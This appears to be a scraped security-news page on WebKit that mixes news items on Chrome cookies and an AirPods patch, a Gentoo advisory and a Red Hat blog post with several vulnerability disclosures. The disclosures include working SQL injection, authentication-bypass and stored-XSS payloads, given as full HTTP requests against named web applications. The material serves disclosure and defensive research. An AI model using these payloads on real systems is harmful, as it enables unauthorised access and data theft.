Google on Monday abandoned plans to phase out third-party tracking cookies in its Chrome web browser more than four years after it introduced the option as part of a larger set of a controversial proposal called the Privacy Sandbox.
"Instead of deprecating third-party cookies, we would introduce a new experience in Chrome that lets people make an informed choice that applies across their web

Online Privacy / Regulatory Compliance

Google on Monday abandoned plans to phase out third-party tracking cookies in its Chrome web browser more than four years after it introduced the option as part of a larger set of a controversial proposal called the Privacy Sandbox.

"Instead of deprecating third-party cookies, we would introduce a new experience in Chrome that lets people make an informed choice that applies across their web browsing, and they'd be able to adjust that choice at any time," Anthony Chavez, vice president of the initiative, said.

"We're discussing this new path with regulators, and will engage with the industry as we roll this out."

The significant policy reversal comes nearly three months following the company's announcement that it intends to eliminate third-party cookies starting early next year after repeated delays, underscoring the project's tumultuous history.

While Apple Safari and Mozilla Firefox no longer support third-party cookies as of early 2020, Google has had a tougher time turning it off owing to its own prominent role as a web browser vendor and an advertising platform.

The company's idea of balancing online privacy vis-à-vis an ad-supported internet using Privacy Sandbox has courted scrutiny from regulators, advertisers, and privacy advocates, prompting it to redraw the contours of the cookie-replacement technology several times over the past few years.

Last month, Austrian privacy non-profit noyb (none of your business) said it merely shifts the control from a third-party to Google and that it can still be used to track users without giving them an option to consent in an informed and transparent manner.

Apple, which has introduced advanced tracking and fingerprinting protections in Safari, has been critical of Topics API, a crucial aspect of Privacy Sandbox that sorts users' interests into an ever-evolving list of predefined topics based on their browsing histories in order to serve personalized ads.

"The user doesn't get told upfront which topics Chrome has tagged them with or which topics it exposes to which parties," Apple's WebKit team said, noting how it can be used to fingerprint and re-identify users as well as profile their cross-site activity.

Specifically, it pointed out implementation loopholes that could potentially allow a data broker embedded in websites to capture a user's changing interests over time by periodically querying the Topics API and creating a permanent profile by combining it with other data points.

"Now imagine what advanced machine learning and artificial intelligence can deduce about you based on various combinations of interest signals," the iPhone maker said. "What patterns will emerge when data brokers and trackers can compare and contrast across large portions of the population?"

"We think the web should not expose such information across websites and we don't think the browser, i.e. the user agent, should facilitate any such data collection or use."

Privacy Sandbox has also faced regulatory hurdles over concerns that the technology could give Google an unfair advantage in the digital advertising market and limit competition, complicating the rollout process further.

The development is an admission from Google that gaining industry-wide consensus around a single solution is more challenging than it sounds. A pivot from cookies "requires significant work by many participants and will have an impact on publishers, advertisers, and everyone involved in online advertising," it said.

The U.K. Competition and Markets Authority (CMA), which is closely overseeing the changes being made by the search giant, said it's evaluating the impact of the new announcement.

"Instead of removing third-party cookies from Chrome, it will be introducing a user-choice prompt, which will allow users to choose whether to retain third-party cookies," the CMA said. "The CMA will now work closely with the \[Information Commissioner's Office\] to carefully consider Google's new approach to Privacy Sandbox."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Abandons Plan to Phase Out Third-Party Cookies in Chrome

Candy Redis version 2.1.2 appears to suffer from an administrative page disclosure issue.

====================================================================================================================================  
| # Title     : Candy Redis V2.1.2 HTML Form in redirect page Vulnerability                                                        |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   |  
| # Vendor    : https://bacadigital.com/pasti-bisa-panduan-ujian-cbt-untuk-pengguna/                                               |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.  
 Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. 

Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example:   
<?php  
    if (!isset($_SESSION["authenticated"])) {  
        header("Location: auth.php");  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    
This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability.   
The correct code would be 

<?php  
    if (!isset($_SESSION[auth])) {  
        header("Location: auth.php");  
        exit();  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    

[+] infected item : /pass. 

[+] Attack details :

Form action=''

GET /pass/ HTTP/1.1  
Pragma: no-cache  
Cache-Control: no-cache  
Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass  
Acunetix-Aspect: enabled  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect-Queries: filelist;aspectalerts  
Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f  
Host: elearning7.smpn49-jkt.sch.id  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

Response  
HTTP/1.1 302 Found  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
x-powered-by: PHP/7.3.33  
location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php  
content-type: text/html; charset=UTF-8  
content-length: 16992  
vary: Accept-Encoding,User-Agent  
date: Fri, 19 Jul 2024 10:09:49 GMT  
server: LiteSpeed  
cache-control: no-cache, no-store, must-revalidate, max-age=0  
platform: hostinger  
strict-transport-security: max-age=31536000; includeSubDomains; preload  
x-xss-protection: 1; mode=block  
x-content-type-options: nosniff  
Original-Content-Encoding: gzip

[+] The impact of this vulnerability : depends on the affected web application.

[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page

Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================

Candy Redis 2.1.2 Admin Page Disclosure

Gentoo Linux Security Advisory 202407-13 - Multiple vulnerabilities have been discovered in WebKitGTK+, the worst of which could lead to arbitrary code execution Versions greater than or equal to 2.44.0:4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-13  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: WebKitGTK+: Multiple Vulnerabilities  
     Date: July 05, 2024  
     Bugs: #923851, #930116  
       ID: 202407-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in WebKitGTK+, the worst  
of which could lead to arbitrary code execution

Background  
==========

WebKitGTK+ is a full-featured port of the WebKit rendering engine,  
suitable for projects requiring any kind of web integration, from hybrid  
HTML/CSS applications to full-fledged web browsers.

Affected packages  
=================

Package              Vulnerable    Unaffected  
-------------------  ------------  -------------  
net-libs/webkit-gtk  < 2.44.0:4    >= 2.44.0:4  
                     < 2.44.0:4.1  >= 2.44.0:4.1  
                     < 2.44.0:6    >= 2.44.0:6

Description  
===========

Multiple vulnerabilities have been discovered in WebKitGTK+. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All WebKitGTK+ users should upgrade to the latest version (depending on  
the installed slots):

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.44.0:4"  
  # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.44.0:4.1"  
  # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.44.0:6"

References  
==========

[ 1 ] CVE-2014-1745  
      https://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1745  
[ 2 ] CVE-2023-40414  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40414  
[ 3 ] CVE-2023-42833  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42833  
[ 4 ] CVE-2023-42843  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42843  
[ 5 ] CVE-2023-42950  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42950  
[ 6 ] CVE-2023-42956  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42956  
[ 7 ] CVE-2024-23206  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23206  
[ 8 ] CVE-2024-23213  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23213  
[ 9 ] CVE-2024-23222  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23222  
[ 10 ] CVE-2024-23252  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23252  
[ 11 ] CVE-2024-23254  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23254  
[ 12 ] CVE-2024-23263  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23263  
[ 13 ] CVE-2024-23280  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23280  
[ 14 ] CVE-2024-23284  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23284  
[ 15 ] WSA-2024-0001  
      https://webkitgtk.org/security/WSA-2024-0001.html  
[ 16 ] WSA-2024-0002  
      https://webkitgtk.org/security/WSA-2024-0002.html

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-13

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-13

Azon Dominator Affiliate Marketing Script suffers from a remote SQL injection vulnerability.

    # Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection# Date: 2024-06-03# Exploit Author: Buğra Enis Dönmez# Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script# Demo Site: https://azon-dominator.webister.net/# Tested on: Arch Linux# CVE: N/A### Request ###POST /fetch_products.php HTTP/1.1Content-Type: application/x-www-form-urlencodedAccept: */*x-requested-with: XMLHttpRequestReferer: https://localhost/Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8Content-Length: 79Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: localhostConnection: Keep-alivecid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112###### Parameter & Payloads ###Parameter: cid (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: cid=1) AND 7735=7735 AND (5267=5267    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442###

Azon Dominator Affiliate Marketing Script SQL Injection

Automad version 2.0.0-alpha.4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)# Date: 20-06-2024# Exploit Author: Jerry Thomas (w3bn00b3r)# Vendor Homepage: https://automad.org# Software Link: https://github.com/marcantondahmen/automad# Category: Web Application [Flat File CMS]# Version: 2.0.0-alpha.4# Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11(bullseye)# DescriptionA persistent (stored) cross-site scripting (XSS) vulnerability has beenidentified in Automad 2.0.0-alpha.4. This vulnerability enables an attackerto inject malicious JavaScript code into the template body. The injectedcode is stored within the flat file CMS and is executed in the browser ofany user visiting the forum. This can result in session hijacking, datatheft, and other malicious activities.# Proof-of-Concept*Step-1:* Login as Admin & Navigate to the endpointhttp://localhost/dashboard/home*Step-2:* There will be a default Welcome page. You will find an option toedit it.*Step-3:* Navigate to Content tab orhttp://localhost/dashboard/page?url=%2F&section=text & edit the block named***`Main`****Step-4:* Enter the XSS Payload - <img src=x onerror=alert(1)>*Request:*POST /_api/page/data HTTP/1.1Host: localhostContent-Length: 1822User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCvAccept: */*Origin: http://localhostReferer: http://localhost/dashboard/page?url=%2F&section=textAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie:Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cbConnection: close------WebKitFormBoundaryzHmXQBdtZsTYQYCvContent-Disposition: form-data; name="__csrf__"49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1------WebKitFormBoundaryzHmXQBdtZsTYQYCvContent-Disposition: form-data; name="__json__"{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testingforxss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSSidentified byJerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"Youhave successfully installed Automad 2.<br><br><img src=xonerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"VisitDashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}------WebKitFormBoundaryzHmXQBdtZsTYQYCv--*Response:*HTTP/1.1 200 OKServer: nginx/1.24.0Date: Thu, 20 Jun 2024 19:17:35 GMTContent-Type: application/json; charset=utf-8Connection: closeX-Powered-By: PHP/8.3.6Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 30`{"code":200,"time":1718911055}*Step-5:* XSS triggers when you go to homepage - http://localhost/

Automad 2.0.0-alpha.4 Cross Site Scripting

Apple has released a firmware update for AirPods that could allow a malicious actor to gain access to the headphones in an unauthorized manner.
Tracked as CVE-2024-27867, the authentication issue affects AirPods (2nd generation and later), AirPods Pro (all models), AirPods Max, Powerbeats Pro, and Beats Fit Pro.
"When your headphones are seeking a connection request to one of your previously

Firmware Security / Vulnerability

Apple has released a firmware update for AirPods that could allow a malicious actor to gain access to the headphones in an unauthorized manner.

Tracked as CVE-2024-27867, the authentication issue affects AirPods (2nd generation and later), AirPods Pro (all models), AirPods Max, Powerbeats Pro, and Beats Fit Pro.

"When your headphones are seeking a connection request to one of your previously paired devices, an attacker in Bluetooth range might be able to spoof the intended source device and gain access to your headphones," Apple said in a Tuesday advisory.

In other words, an adversary in physical proximity could exploit the vulnerability to eavesdrop on private conversations. Apple said the issue has been addressed with improved state management.

Jonas Dreßler has been credited with discovering and reporting the flaw. It has been patched as part of AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8.

The development comes two weeks after the iPhone maker rolled out updates for visionOS (version 1.2) to close out 21 shortcomings, including seven flaws in the WebKit browser engine.

One of the issues pertains to a logic flaw (CVE-2024-27812) that could result in a denial-of-service (DoS) when processing web content. The problem has been fixed with improved file handling, it said.

Security researcher Ryan Pickren, who reported the vulnerability, described it as the "world's first spatial computing hack" that could be weaponized to "bypass all warnings and forcefully fill your room with an arbitrary number of animated 3D objects" sans user interaction.

The vulnerability takes advantage of Apple's failure to apply the permissions model when using the ARKit Quick Look feature to spawn 3D objects in a victim's room. Making matters worse, these animated objects continue to persist even after exiting Safari as they are handled by a separate application.

"Furthermore, it does not even require this anchor tag to have been 'clicked' by the human," Pickren said. "So programmatic JavaScript clicking (i.e., document.querySelector('a').click()) works no problem! This means that we can launch an arbitrary number of 3D, animated, sound-creating, objects without any user interaction whatsoever."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Patches AirPods Bluetooth Vulnerability That Could Allow Eavesdropping

Student Attendance Management System version 1.0 suffers from a remote SQL Injection vulnerability that allows for authentication bypass.

    ## Titles: Student Attendance Management System-1.0 Bypass AuthenticationSQLi## Author: nu11secur1ty## Date: 06/22/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter is not sanitizing well, the attacker can injectdirect queries into the login form and easily bypass the authentication ofthe admin account.STATUS: CRITICAL- Vulnerability[+]Exploits:- Exploit:```POSTPOST /student_attendance/ajax.php?action=login HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=2otv2s74md44qhb7do890mhhp4Content-Length: 104Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"Accept-Language: en-USSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept: */*X-Requested-With: XMLHttpRequestSec-Ch-Ua-Platform: "Windows"Origin: https://pwnedhost.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pwnedhost.com/student_attendance/login.phpAccept-Encoding: gzip, deflate, brPriority: u=1, iConnection: keep-aliveusername=nu11secur1ty'+or+1%3D1%23&password=stupiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiid```[+]Response```HTTPHTTP/1.1 200 OKDate: Sat, 22 Jun 2024 06:37:41 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 1Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-81```## Reproduce:[href](https://www.patreon.com/posts/student-system-1-106665723)## Proof and Exploit:[href](https://www.patreon.com/posts/student-system-1-106665723)## Time spent:01:25:00

Student Attendance Management System 1.0 SQL Injection

SPA-CART CMS version 1.9.0.6 suffers from business logic and user enumeration flaws.

# Exploit Title: Business Logic Flaw and Username Enumeration in  
spa-cartcmsv1.9.0.6  
# Date: 6/2024  
# Exploit Author: Andrey Stoykov  
# Version:  1.9.0.6  
# Tested on: Ubuntu 22.04  
# Blog:  
https://msecureltd.blogspot.com/2024/04/friday-fun-pentest-series-5-spa.html  
<http://msecureltd.blogspot.com/>

Description

- It was found that the application suffers from business logic flaw

- Additionally the application is vulnerable to username enumeration on the  
login page

Logic Flaw

Steps to Reproduce:

   1. Checkout page and intercept HTTP POST request  
   2. Add minus quantity such as -10  
   3. The final price would come up as negative value

// HTTP POST request modifying the quantity to negative value

POST /cart/add HTTP/2  
Host: demo.spa-cart.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/123.0.6312.122  
[...]

productid=225&amount=-10

// HTTP response

HTTP/2 200 OK  
Server: nginx  
[...]

[...]  
<img src="https://demo.spa-cart.com/var/photo/product/234x200/225/695/1.jpg"  
alt="" /><b>Five And Two Jewelry Piper Gold-Plated Earrings</b> added to  
cart  
<br /><br />  
<strong class="added_price">Price: <span><span  
class="currency">$</span>59.00</span></strong>  
<div class="added_options">  
<b>Selected options:</b>  
Qty: 1<br />  
Color: silver gold<br />  
</div>  
[...]

// HTTP GET request to checkout

GET /checkout HTTP/2  
Host: demo.spa-cart.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/123.0.6312.122  
[...]

// HTTP response showing negative amount owned

HTTP/2 200 OK  
Server: nginx  
[...]

[...]  
\t<td>silver gold<\/td>\r\n<\/tr>\r\n<\/table>\r\n <\/td>\r\n <td  
class=\"line\" nowrap align=\"right\">\r\n<span  
class=\"currency\">$<\/span>59.00 x -10 =  
<span class=\"currency\">$<\/span>-590.00 <\/td>  
[...]

Username Enumeration:

Steps to Reproduce:

   1. Register account  
   2. Enter valid account with wrong password  
   3. Trap HTTP request  
   4. Check that response for valid username has "P" message  
   5. Enter invalid account with wrong password  
   6. Check that response for invalid username has "E" message

// HTTP POST request with valid username and wrong password

POST /login HTTP/2  
Host: demo.spa-cart.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36  
[...]

email=test%40test.test&password=test123

// HTTP response showing "P" error message

HTTP/2 200 OK  
Server: nginx  
[...]

P

// HTTP POST request with invalid username and wrong password

POST /login HTTP/2  
Host: demo.spa-cart.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36  
[...]

email=test%40test.t3st&password=test123

// HTTP response showing "E" error message

HTTP/2 200 OK  
Server: nginx  
[...]

E

SPA-CART CMS 1.9.0.6 Username Enumeration / Business Logic Flaw

In a previous Red Hat article, VP of Red Hat Product Security, Vincent Danen, discussed the question "Do all vulnerabilities really matter?" He emphasized that "a  software vulnerability has the potential to be exploited by miscreants to harm its user." The key word here is "potential". If the potential for exploitation is high, or if an exploit for a vulnerability is already in use in the wild, then these vulnerabilities pose a greater risk and must be prioritized and addressed promptly.Red Hat uses CISA as a source for known exploited vulnerabilitiesThe Cybersecurity and Infrastructure Secur

In a previous Red Hat article, VP of Red Hat Product Security, Vincent Danen, discussed the question "Do all vulnerabilities really matter?" He emphasized that "a  software vulnerability has the potential to be exploited by miscreants to harm its user." The key word here is "potential". If the potential for exploitation is high, or if an exploit for a vulnerability is already in use in the wild, then these vulnerabilities pose a greater risk and must be prioritized and addressed promptly.

**Red Hat uses CISA as a source for known exploited vulnerabilities**

The Cybersecurity and Infrastructure Security Agency (CISA) leads the US national effort to understand, manage, and reduce risk to their cyber and physical infrastructure. CISA maintains a Known Exploited Vulnerabilities (KEV) catalog, otherwise known as the CISA catalog.

In November 2021, CISA issued the binding operational directive CISA BOD 22-01. This directive requires that all US Government federal agencies (USG) identify and remediate all vulnerabilities listed in the CISA catalog in their information systems. Additionally, this catalog is available to the public so other non-USG customers can be aware of the listed exploited vulnerabilities and seek immediate remediations. The vulnerabilities listed have been observed to be exploited in the wild, presenting an elevated risk.

In response, Red Hat created a program to resolve vulnerabilities added to the KEV list as quickly as possible. This program helps Red Hat to continue strengthening our security posture across our software portfolio while maintaining our reputation as a trustworthy partner.

**How well did Red Hat remediate exploited in the wild vulnerabilities?**

As described in CISA BOD-22-01, CISA has three main criteria for adding vulnerabilities to the KEV:

1.  A Common Vulnerabilities and Exposures (CVE) ID
2.  Clear remediation guidance
3.  Reliable evidence of exploitation in the wild

In 2023, the CISA catalog included 20 CVEs that impacted Red Hat products.  The following table displays the breakdown by severity. 

Severity rating

Total Red Hat  Flaw counts

In the wild exploitation

In the wild exploitation as a percentage of total flaw counts

All

1644

20

1.2%

Critical

12

1

5.3%

Important

336

15

4.5%

Moderate

1047

3

0.3%

Low

247

1

0.4%

The amount of vulnerabilities exploited in the wild was fairly low,  accounting for 1.2% of the total flaws that impacted Red Hat in 2023. Once Red Hat is notified that a CVE is  added to the CISA catalog, Red Hat provides a fix for the vulnerability within an average of 10 calendar days (notably faster than the 21 calendar days that CISA gives for the vulnerability to be resolved).

It is also important to note that Red Hat has released errata for approximately 24% of these Exploit CVEs before they were added to the CISA catalog. 

More than half of the exploited in the wild vulnerabilities pertain to the WebKitGTK package. WebKit is one of the three big web rendering engines. The exploit primarily targets iOS users and sometimes macOS users, as well as any software using the JavaScript Just in Time (JIT) compiler. To better enhance the security of Red Hat software,  Red Hat has disabled the JavaScript JIT mechanism in the 8.8 z-stream and 9.2 z-stream RHEL releases. This action is expected to cut down on the volume of WebKit vulnerabilities by half going forward. 

**Security awareness**

Red Hat Product Security's awareness and visibility into reported exploited vulnerabilities enable us to proactively address rising threats and fix vulnerabilities that truly matter. These actions allow Red Hat to remain a trusted vendor and partner to our customers. At Red Hat, openness and transparency are embedded in our culture. This culture of transparency influences our customer interactions and allows us to be a trusted partner. Sharing pertinent information makes our community well-informed and well-versed, especially when it comes to security. 

Enter keywords here to search blogs

UI\_Icon-Red\_Hat-Close-A-Black-RGB

Reducing the significant risk of known exploitable vulnerabilities in Red Hat software

AEGON LIFE version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title:  Life Insurance Management Stored System- cross-site scripting (XSS)# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https://projectworlds.in/# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36599# Description:----------------A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.# Payload:----------------<script>alert(document.domain)</script># Attack Vectors:-------------------------To exploit this vulnerability use <script>alert(document.domain)</script> when user visit Client.php we can see the XSS.# Burp Suite Request:----------------------------POST /lims/insertClient.php HTTP/1.1Host: localhostContent-Length: 30423Cache-Control: max-age=0sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/lims/addClient.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78nConnection: close------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="client_id"1716051159------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="client_password"password------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="name"<script>alert(document.domain)</script>------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original"Content-Type: application/octet-streamÿØÿà

Tag

#webkit